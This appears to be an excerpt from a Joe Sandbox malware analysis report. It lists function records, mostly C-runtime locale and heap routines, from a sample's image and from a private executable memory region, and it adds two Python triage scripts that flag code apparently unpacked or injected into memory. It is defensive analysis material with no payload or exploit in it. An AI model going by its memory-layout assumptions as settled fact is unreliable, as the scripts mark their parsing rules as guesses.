• Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
• Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
• Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
• Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
  • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
  • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
  • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
• _wcschr.LIBVCRUNTIME ref: 004201D5
• _wcschr.LIBVCRUNTIME ref: 004201E3
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
• String ID: 0B$DCA
• API String ID: 4212172061-1121888207
• Opcode ID: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
• Instruction ID: e41c47d1cae27ef38c8e1a894900132afe6bf825e943f98d621edfc326b9cdfb
• Opcode Fuzzy Hash: 46676c4ac3c69468ff1db77bf10ad3de6e3b023533a561db1a5166dfe2bba4dc
• Instruction Fuzzy Hash: 34610775700225AAD724AB65EC46BBB77E8EF04314F54006FF905DB283EB78ED418768
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420860
• GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,00420AE6,?,00000000), ref: 00420889
• GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP$B
• API String ID: 2299586839-1332025818
• Opcode ID: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
• Instruction ID: b7a8718eca8bd207e438c17e895b22dc0f84da9ff629001d2d850ed802a8b5f8
• Opcode Fuzzy Hash: 06e0d05587b56d9904c443129aec0706fd7a1e514c1b8a60ecd4226da2314d5f
• Instruction Fuzzy Hash: 5321F422B00124AADB34AF14E900BA773E6EF90B10BD68476E809D7312E736DD41C3D9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
  • Part of subcall function 05CF6F80: GetLastError.KERNEL32(?,?,05CEE697,?,?,?,05CEED94,?), ref: 05CF6F84
  • Part of subcall function 05CF6F80: _free.LIBCMT ref: 05CF6FB7
  • Part of subcall function 05CF6F80: SetLastError.KERNEL32(00000000), ref: 05CF6FF8
  • Part of subcall function 05CF6F80: _abort.LIBCMT ref: 05CF6FFE
  • Part of subcall function 05CF6F80: _free.LIBCMT ref: 05CF6FDF
  • Part of subcall function 05CF6F80: SetLastError.KERNEL32(00000000), ref: 05CF6FEC
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 05D00D0E
• IsValidCodePage.KERNEL32(00000000), ref: 05D00D69
• IsValidLocale.KERNEL32(?,00000001), ref: 05D00D78
• GetLocaleInfoW.KERNEL32(?,00001001,05CF45A4,00000040,?,05CF46C4,00000055,00000000,?,?,00000055,00000000), ref: 05D00DC0
• GetLocaleInfoW.KERNEL32(?,00001002,05CF4624,00000040), ref: 05D00DDF
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
• String ID:
• API String ID: 745075371-0
• Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
• Instruction ID: 1b3f77dc5bbd182de0f3380a07d744a098785df922b5e67a4064eec65d75b883
• Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
• Instruction Fuzzy Hash: 7C518F71A00209BBDB20DFA4DC48BBE73B8FF08700F84546AE905EB2D0DB70A9458B71
Uniqueness
Uniqueness Score: -1.00%
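What follows is an added example, not Joe Sandbox code or tooling from this report: a Python triage script for the per-function records in this section. It parses the API lines, the Source File name and the "Yara matches" marker of each record, decodes the protection and region-type fields of the .sdmp name, and ranks each record. The field layout of the .sdmp name (pid.iteration.dumpid.base.protect.state.type.module) is an assumption inferred from the names on this page; PAGE_EXECUTE_READWRITE, MEM_PRIVATE and MEM_IMAGE are the documented winnt.h constants; the sample records are a trimmed, constructed copy of two entries above.

```python
"""Triage Joe Sandbox function records by where the code lives.

Added example, not Joe Sandbox's own code.  ASSUMPTION: the .sdmp name is
  <pid>.<iteration>.<dumpid>.<base>.<protect>.<state>.<type>.<module>.sdmp
with <protect> and <type> holding winnt.h MEMORY_BASIC_INFORMATION values;
only those two fields are decoded.
"""
import re
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40      # winnt.h
MEM_PRIVATE = 0x20000              # winnt.h
MEM_IMAGE = 0x1000000              # winnt.h

# APIs the statically linked MSVC CRT calls during locale/heap setup.  A
# function that calls only these is runtime boilerplate, not malware logic.
CRT_INIT_APIS = {
    "GetACP", "GetLastError", "SetLastError", "GetUserDefaultLCID",
    "IsValidCodePage", "IsValidLocale", "GetLocaleInfoW", "EnumSystemLocalesW",
    "RtlFreeHeap", "_free", "_abort", "___free_lconv_mon",
}

API_RE = re.compile(
    r"•\s+(?:Part of subcall function [0-9A-F]+: )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)"
)
SRC_RE = re.compile(
    r"Source File: (?P<name>\S+\.sdmp), Offset: (?P<off>[0-9A-F]+), "
    r"based on PE: (?P<pe>true|false)"
)
APIID_RE = re.compile(r"•\s+API ID: (?P<id>\S*)")

# Constructed sample: two records from this section, trimmed to the fields used.
SAMPLE = """\
APIs
• GetACP.KERNEL32(?,?,00420AE6,?,00000000), ref: 0042089E
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InfoLocale

APIs
  • Part of subcall function 05CF6F80: GetLastError.KERNEL32(?,?,05CEE697,?,?,?,05CEED94,?), ref: 05CF6F84
• GetUserDefaultLCID.KERNEL32(?,?,?), ref: 05D00D0E
• IsValidLocale.KERNEL32(?,00000001), ref: 05D00D78
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Yara matches
Similarity
• API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
"""


@dataclass
class Record:
    apis: list = field(default_factory=list)   # (api, module, call-site address)
    dump: str = ""
    offset: int = 0
    based_on_pe: bool = False
    yara: bool = False
    api_id: str = ""

    def crt_noise(self) -> bool:
        """True when every API the function touches is CRT start-up plumbing."""
        return bool(self.apis) and all(a in CRT_INIT_APIS for a, _, _ in self.apis)


def parse_records(text: str) -> list:
    """Split the report text into Records; every record begins at an 'APIs' line."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Record()
            records.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.search(s)):
            cur.apis.append((m["api"], m["mod"], int(m["ref"], 16)))
        elif (m := SRC_RE.search(s)):
            cur.dump, cur.offset = m["name"], int(m["off"], 16)
            cur.based_on_pe = m["pe"] == "true"
        elif s == "Yara matches":
            cur.yara = True
        elif (m := APIID_RE.match(s)):
            cur.api_id = m["id"]
    return records


def decode_dump(name: str) -> dict:
    """Decode base, protection and region type from the assumed .sdmp layout."""
    parts = name[: -len(".sdmp")].split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected sdmp name layout: {name}")
    protect, rtype = int(parts[4], 16), int(parts[6], 16)
    return {"base": int(parts[3], 16), "protect": protect, "type": rtype,
            "rwx": protect == PAGE_EXECUTE_READWRITE,
            "private": rtype == MEM_PRIVATE, "image": rtype == MEM_IMAGE}


def triage(records: list) -> list:
    """Return (base, API ID, verdict) per record; location outranks function body."""
    out = []
    for r in records:
        d = decode_dump(r.dump)
        if d["image"] != r.based_on_pe:   # guards the field-layout assumption
            raise ValueError(f"type flag disagrees with 'based on PE' for {r.dump}")
        verdict = "crt-noise" if r.crt_noise() else "review"
        if d["rwx"] and d["private"] and r.yara:
            verdict = "unpacked-code-candidate"
        out.append((f"{d['base']:08X}", r.api_id, verdict))
    return out


if __name__ == "__main__":
    for row in triage(parse_records(SAMPLE)):
        print(*row)
```

The ranking encodes the reading a reverser would give these records. Every API listed in them belongs to the CRT's locale and heap initialisation (GetACP, GetLocaleInfoW, EnumSystemLocalesW, _free, _abort), so the functions themselves are not worth disassembling. What matters is where they were found: the 00400000 dump is image-backed (type MEM_IMAGE, "based on PE: true"), while the 05CE0000 dump is a private, execute+writable region with no PE mapping that also carried Yara matches. The same CRT API IDs (for example `_free$Info`) appearing at both bases is consistent with a second, unpacked or injected CRT-linked executable having been written into that region. The `image` versus `based on PE` check is there so that, if a different Joe Sandbox version lays the .sdmp name out differently, the script fails loudly rather than mis-ranking.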

APIs
  • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
  • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
  • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
  • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
• EnumSystemLocalesW.KERNEL32(0042044E,00000001,00000000,?,=CA,?,00420A7B,00000000,?,?,?), ref: 00420398
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: =CA${B
• API String ID: 1084509184-2907596089
• Opcode ID: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
• Instruction ID: a8185422c35251c6cfc048f10f275341fbfc1625dfe7a1aac3b0cf2615d37100
• Opcode Fuzzy Hash: 1d9bf60f0abe0dbe1f752cbb177dcec6442ae78d04ecd333e47c8cd67647e2f9
• Instruction Fuzzy Hash: 9D11293A3003055FDB28DF39D8916BABBD1FF84358B54842EEA4687B41D775A843CB44
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
• Instruction ID: f64e8217d5a59399788f44db3acace11ca7a1a82a17f4f1e7e4f503dd26c9166
• Opcode Fuzzy Hash: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
• Instruction Fuzzy Hash: 68B1CF71900305AFDB20DFA5C881BEEBBF5BF48304F14416EF959E7242D7B9A8918B64
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
• Opcode ID: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
• Instruction ID: 0fa511688b48b848b1492c6ab2b95ba10a1dac2812503ef09f824dcb0dceca9a
• Opcode Fuzzy Hash: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
• Instruction Fuzzy Hash: E5B1C071A00205AFDF61DFB8CC84BEEBBF5FF08300F144829EA95A7281DB7599459B60
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 0041F695
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
  • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9
• _free.LIBCMT ref: 0041F68A
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 0041F6AC
• _free.LIBCMT ref: 0041F6C1
• _free.LIBCMT ref: 0041F6CC
• _free.LIBCMT ref: 0041F6EE
• _free.LIBCMT ref: 0041F701
• _free.LIBCMT ref: 0041F70F
• _free.LIBCMT ref: 0041F71A
• _free.LIBCMT ref: 0041F752
• _free.LIBCMT ref: 0041F759
• _free.LIBCMT ref: 0041F776
• _free.LIBCMT ref: 0041F78E
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                  • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68314A316007049FEB20AA3AE845BD773E8FB44318F15446FE859D72A1DB38FCC68A18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• ___free_lconv_mon.LIBCMT ref: 05CFF8FC
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFEC68
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFEC7A
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFEC8C
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFEC9E
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECB0
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECC2
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECD4
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECE6
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFECF8
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFED0A
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFED1C
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFED2E
  • Part of subcall function 05CFEC4B: _free.LIBCMT ref: 05CFED40
• _free.LIBCMT ref: 05CFF8F1
  • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
  • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
• _free.LIBCMT ref: 05CFF913
• _free.LIBCMT ref: 05CFF928
• _free.LIBCMT ref: 05CFF933
• _free.LIBCMT ref: 05CFF955
• _free.LIBCMT ref: 05CFF968
• _free.LIBCMT ref: 05CFF976
• _free.LIBCMT ref: 05CFF981
• _free.LIBCMT ref: 05CFF9B9
• _free.LIBCMT ref: 05CFF9C0
• _free.LIBCMT ref: 05CFF9DD
• _free.LIBCMT ref: 05CFF9F5
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
• Instruction ID: d4068977cb5253b4f2629476f9d6354059efdd048af8dbcf172f3225aa91e7c5
• Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
• Instruction Fuzzy Hash: FE316031604206BFDFB1AA78D848B6A73E9FF00214F144C1EE69AE7150EF72EB819751
Uniqueness
Uniqueness Score: -1.00%
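The two entries above carry the same Opcode ID (4378ab1e…) but come from different dumps: the first from the mapped image at 00400000 (based on PE: true), the second from the region at 05CE0000 that has no PE header (based on PE: false). The second copy has a different Instruction ID and Instruction Fuzzy Hash and calls HeapFree.KERNEL32 where the first calls RtlFreeHeap.NTDLL, which is the picture the report's "Detected unpacking" signatures predict: the same CRT cleanup routine (___free_lconv_mon / _free) present once in the original image and again in memory the sample allocated itself. The script below is an added example, not Joe Sandbox code, and parses entries in the layout shown on this page to surface exactly that pattern across a whole report. REPORT_EXCERPT is a constructed, shortened copy of the two entries above; reading "same Opcode ID, different Instruction ID" as "same opcodes with relocated operands" is an assumption about what the two hashes cover, as is the field grammar used by the regular expressions.

```python
"""Added example (not from the Joe Sandbox report): parse per-function entries in
the layout shown on this page and flag functions whose Opcode ID appears both in
a PE-backed dump and in a dump that has no PE header."""
import re
from dataclasses import dataclass, field

# Constructed, shortened excerpt of the two entries above (API argument lists trimmed).
REPORT_EXCERPT = """\
APIs
• _free.LIBCMT ref: 0041F6AC
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004162B0
• _free.LIBCMT ref: 0041F6C1
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
• Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
Uniqueness Score: -1.00%
APIs
• ___free_lconv_mon.LIBCMT ref: 05CFF8FC
• _free.LIBCMT ref: 05CFF8F1
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
• Instruction ID: d4068977cb5253b4f2629476f9d6354059efdd048af8dbcf172f3225aa91e7c5
Uniqueness Score: -1.00%
"""

# Field grammar inferred from the page (assumption): "• Key: value" lines.
FIELD_RE = re.compile(r"^•\s*(?P<key>Source File|API ID|Opcode ID|Instruction ID):\s*(?P<value>.*)$")
SOURCE_RE = re.compile(r"^(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$")
CALL_RE = re.compile(r"^•\s*(?P<name>[^.\s(]+)\.(?P<module>[A-Za-z0-9]+).*?\bref:\s*(?P<addr>[0-9A-Fa-f]+)\s*$")

@dataclass
class FunctionEntry:
    source_file: str = ""
    offset: int = 0
    pe_backed: bool = False
    api_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    calls: list = field(default_factory=list)  # the function's own (name, module, ref) call sites

def parse_entries(text):
    """One FunctionEntry per block; a block ends at its 'Uniqueness Score' line.
    Indented 'Part of subcall function' lines describe callees and are skipped."""
    entries, cur = [], FunctionEntry()
    for line in text.splitlines():
        line = line.rstrip()
        if not line or line[0].isspace():
            continue
        if line.startswith("Uniqueness Score"):
            entries.append(cur)
            cur = FunctionEntry()
            continue
        m = FIELD_RE.match(line)
        if m:
            key, value = m.group("key"), m.group("value").strip()
            if key == "Source File":
                s = SOURCE_RE.match(value)
                if s is None: raise ValueError("unparsable Source File line: " + value)
                cur.source_file, cur.offset = s.group("file"), int(s.group("off"), 16)
                cur.pe_backed = s.group("pe") == "true"
            else:
                setattr(cur, key.lower().replace(" ", "_"), value)
            continue
        c = CALL_RE.match(line)
        if c:
            cur.calls.append((c.group("name"), c.group("module"), int(c.group("addr"), 16)))
    return entries

def find_unpacked_copies(entries):
    """Opcode IDs present both in a PE-backed dump and in a dump without a PE header.
    'relocated' reads a differing Instruction ID as same opcodes, different operands (assumption)."""
    by_opcode = {}
    for e in entries:
        by_opcode.setdefault(e.opcode_id, []).append(e)
    hits = []
    for opcode_id, group in by_opcode.items():
        image = [e for e in group if e.pe_backed]
        loose = [e for e in group if not e.pe_backed]
        if image and loose:
            hits.append({
                "opcode_id": opcode_id,
                "api_id": image[0].api_id,
                "image_offsets": sorted({e.offset for e in image}),
                "copy_offsets": sorted({e.offset for e in loose}),
                "relocated": any(e.instruction_id != image[0].instruction_id for e in loose),
            })
    return hits

if __name__ == "__main__":
    for h in find_unpacked_copies(parse_entries(REPORT_EXCERPT)):
        print(h["api_id"], [hex(o) for o in h["image_offsets"]], "->",
              [hex(o) for o in h["copy_offsets"]], "relocated:", h["relocated"])
```

Run against a full report the same way (paste the function entries into REPORT_EXCERPT or read them from a file) and every hit is a function the sample carried in its original image and then reproduced in memory it allocated itself; sorting hits by the number of API calls in the image copy, or by Yara matches on the non-PE dump, is a quick way to pick the dump worth carving out for static analysis. The HeapFree versus RtlFreeHeap difference between the two copies is only a symbol-resolution artefact (kernel32!HeapFree is a thin wrapper over ntdll!RtlFreeHeap), which is why grouping on Opcode ID rather than on API ID is the right key.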

APIs
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
• Instruction ID: 07e65b0fe858109c33bb0f60f82280ccd5dee523497fe62cc235ec4013c6f493
• Opcode Fuzzy Hash: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
• Instruction Fuzzy Hash: 9EC15575E40304ABDB20DBA9CC46FDE77F8EB48704F14416AFE05EB282D674AD818798
Uniqueness
Uniqueness Score: -1.00%

APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: DecodePointer
• String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-940912563
• Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
• Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
• Opcode Fuzzy Hash: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
• Instruction Fuzzy Hash: 52518970A00229DBCF10DFA9F9481ADBBB0FB09305FE4419BE481A6254CB7D9B65CB1D
Uniqueness
Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 00416C39
  • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
  • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
• _free.LIBCMT ref: 00416C45
• _free.LIBCMT ref: 00416C50
• _free.LIBCMT ref: 00416C5B
• _free.LIBCMT ref: 00416C66
• _free.LIBCMT ref: 00416C71
• _free.LIBCMT ref: 00416C7C
• _free.LIBCMT ref: 00416C87
• _free.LIBCMT ref: 00416C92
• _free.LIBCMT ref: 00416CA0
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
• Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
• Instruction Fuzzy Hash: B311E976100218BFDF01FF95D952DD93B65EF48358B4280AAFD088F222DA35EE919B84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 05CF6EA0
  • Part of subcall function 05CF6501: HeapFree.KERNEL32(00000000,00000000,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?), ref: 05CF6517
  • Part of subcall function 05CF6501: GetLastError.KERNEL32(?,?,05CFF3B8,?,00000000,?,00000000,?,05CFF65C,?,00000007,?,?,05CFFA50,?,?), ref: 05CF6529
• _free.LIBCMT ref: 05CF6EAC
• _free.LIBCMT ref: 05CF6EB7
• _free.LIBCMT ref: 05CF6EC2
• _free.LIBCMT ref: 05CF6ECD
• _free.LIBCMT ref: 05CF6ED8
• _free.LIBCMT ref: 05CF6EE3
• _free.LIBCMT ref: 05CF6EEE
• _free.LIBCMT ref: 05CF6EF9
• _free.LIBCMT ref: 05CF6F07
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
